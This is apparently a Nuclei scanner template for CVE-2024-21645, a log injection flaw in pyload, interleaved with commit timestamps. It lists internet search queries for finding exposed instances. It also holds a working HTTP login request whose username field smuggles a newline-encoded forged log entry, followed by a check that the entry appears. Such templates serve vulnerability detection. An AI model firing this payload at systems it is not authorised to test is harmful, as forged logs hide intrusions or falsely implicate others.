2024-02-01 05:40:06 +00:00
id : CVE-2024-21645
info :
name : pyload - Log Injection
author : isacaya
severity : medium
description : |
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
2024-03-23 09:28:19 +00:00
impact : |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
2024-02-01 05:40:06 +00:00
reference :
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
- https://nvd.nist.gov/vuln/detail/CVE-2024-21645
2024-02-04 19:23:41 +00:00
- https://github.com/fkie-cad/nvd-json-data-feeds
2024-02-01 05:40:06 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score : 5.3
cve-id : CVE-2024-21645
cwe-id : CWE-74
2024-06-07 10:04:29 +00:00
epss-score : 0.0112
epss-percentile : 0.84559
2024-03-23 09:28:19 +00:00
cpe : cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
2024-02-04 19:23:41 +00:00
metadata :
verified : true
2024-03-23 09:28:19 +00:00
max-request : 2
2024-02-04 19:23:41 +00:00
vendor : pyload
product : pyload
2024-06-07 10:04:29 +00:00
shodan-query :
- "title:\"pyload\""
- http.title:"login - pyload"
- http.html:"pyload"
- http.title:"pyload"
fofa-query :
- title="login - pyload"
- body="pyload"
- title="pyload"
google-query :
- intitle:"login - pyload"
- intitle:"pyload"
2024-05-31 19:23:20 +00:00
zoomeye-query : app:"pyload"
2024-02-04 19:23:41 +00:00
tags : cve,cve2024,pyload,authenticated,injection
variables :
str : "{{rand_base(6)}}"
2024-02-01 05:40:06 +00:00
http :
2024-02-04 19:23:41 +00:00
- raw :
- |
POST /login?next={{RootURL}} HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
do=login&username={{randstr}}\'%0a[1970-01-01 00:00:00] INJECTED {{str}} THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login
- |
POST /login?next={{RootURL}}/logs HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
do=login&username={{username}}&password={{password}}&submit=Login
2024-02-01 05:40:06 +00:00
redirects : true
max-redirects : 1
matchers-condition : and
matchers :
- type : word
2024-02-04 19:23:41 +00:00
part : body
2024-02-01 05:40:06 +00:00
words :
2024-02-04 19:23:41 +00:00
- '<td>1970-01-01 00:00:00</td><td class="loglevel">INJECTED</td><td class="logsource">{{str}}</td><td>THIS ENTRY HAS BEEN INJECTED'</td>'
2024-02-01 05:40:06 +00:00
2024-02-04 19:23:41 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 490a004630440220216ceedbf4e4d3fc297fe0289353b2e737908320f01c52ee6744165ec80d0a250220380aec9a972d971780f7b55d7c2aedc82995efa4ff37219641782625ac06a453:922c64590222798bb761d5b6d8e72950